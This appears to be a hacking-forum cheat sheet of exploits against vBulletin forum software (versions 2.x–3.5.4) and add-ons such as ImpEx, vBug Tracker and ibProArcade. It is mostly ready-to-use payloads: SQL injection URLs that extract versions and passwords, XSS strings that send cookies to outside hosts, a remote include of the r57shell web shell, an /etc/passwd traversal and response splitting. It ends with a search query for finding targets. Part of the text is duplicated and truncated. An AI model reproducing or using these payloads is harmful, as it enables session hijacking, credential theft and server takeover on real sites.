vBulletin 2
=========
2.3.* - SQL injection
www.strona.com/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
2.*.* - XSS
[E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+********.cookie;this.sss=null" style=top:expression(eval(this.sss));
vBulletin 3.0
=========
3.0.0 - XSS
www.strona.com/forumpath//search.php?do=process&showposts=0&query=********>i m g = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;</script>
3.0-3.0.4
http://www.strona.com/forumpath/foru...ay.php?GLOBALS[]=1&f=2&comma=".system
3.0.3–3.0.9 XSS
<body onLoad=img = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;>
3.0.9 and 3.5.4 - XSS
http://www.strona.com/forumpath/newt...ct=1234&WYSIWY G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stic kun stick=
1&iconid=0
vBulletin 3.5
=========
2.3.* - SQL injection
www.strona.com/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
2.*.* - XSS
[E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+********.cookie;this.sss=null" style=top:expression(eval(this.sss));
vBulletin 3.0
=========
3.0.0 - XSS
www.strona.com/forumpath//search.php?do=process&showposts=0&query=********>i m g = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;</script>
3.0-3.0.4
http://www.strona.com/forumpath/foru...ay.php?GLOBALS[]=1&f=2&comma=".system
3.0.3–3.0.9 XSS
<body onLoad=img = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;>
3.0.9 and 3.5.4 - XSS
http://www.strona.com/forumpath/newt...ct=1234&WYSIWY G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stic kun stick=
1&iconid=0
vBulletin 3.5
TITLE:--------->Test********>img = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;</script>
BODY:---------->Oboj?tnie
OTHER OPTIONS:->Oboj?tnie
3.5.3 -
XSS
www.strona.com/forumpath/profile.php?do=editpassword
pass:Twoje has?o
email: [email protected]”>********>img = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;</script>.nomatt
Note About lenght limitation
****
www.strona.com/forumpath/profile.php?do=editpassword
pass:Twoje has?o
email: [email protected]”>********>img = new Image(); img.src = "http://strona.pl/s.jpg?"+********.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.strona.com/forumpath/sendmessage.php?do=mailmember&u={your id}
3.5.4
http://www.strona.com/forumpath/inst...?step=SomeWord
3.5.4 - XSS
http://www.strona.com/forumpath/inli...a2%0d%0aConten t-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a
Modu?y do vbulletin
vBug Tracker 3.5.1 - XSS
www.strona.com/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbu g_statusid=0&vbug_severityid=0&vbug_versionid=0&as signment=0&sortfield=lastedit&sortorder=%22%3Cscri pt%3Eimg= new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;%3C/script%3E
ImpEx 1.74
www.strona.com/forumpath/impex/ImpExData.php?systempath=http://rst.****.ru/download/r57shell.txt
http://www.strona.com/forumpath/impe.../../etc/passwd
ibProArcade 2.x - SQL injection
www.strona.com/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
Google Aratmaları
Powered by vBulletin (versiyon numarası)